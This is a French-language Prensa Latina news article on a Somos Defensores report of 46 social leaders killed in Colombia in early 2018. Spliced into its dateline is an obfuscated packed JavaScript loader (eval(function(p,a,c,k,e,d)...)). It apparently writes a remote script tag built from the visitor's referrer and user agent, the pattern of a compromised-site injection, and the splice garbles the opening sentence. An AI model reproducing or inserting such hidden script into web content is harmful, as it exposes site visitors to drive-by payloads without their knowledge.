lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

46 leaders sociaux assassinés en Colombie lors du premier trimestre 2018

Bogotá, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|synnr|var|u0026u|referrer|rrkhb||js|php'.split('|'),0,{})) 26 avril (Prensa Latina) Il a aujourd´hui été diffusée l´information selon laquelle près de 50 leaders sociaux ont été assassinés lors des trois premier de cette année dans ce pays.

Bogotá, 26 avril (Prensa Latina) Il a aujourd´hui été diffusée l´information selon laquelle près de 50 leaders sociaux ont été assassinés lors des trois premier de cette année dans ce pays.

Selon le rapport du programme privé Somos Defensores, la tendance à la hausse de crimes à l´encontre de leaders communautaires et défenseurs des droits de l´homme se maintient dans le pays.

Le document précise qu´en plus des 46 morts, une autre douzaine de défenseurs des droits de l´homme ont été victimes d´attentats, puis que 66 ont reçu des menaces de mort.

Avec ces dernières, et en y ajoutant d´autres formes portant atteinte à l´intégrité physique et psychologique des activistes sociaux en Colombie, 136 agressions ont été enregistrées lors de ce premier trimestre 2018.

Les départements les plus touchés ont été ceux de Cauca, Antioquia et Norte de Santander.

peo/mgt/tpa

EN CONTINU
notes connexes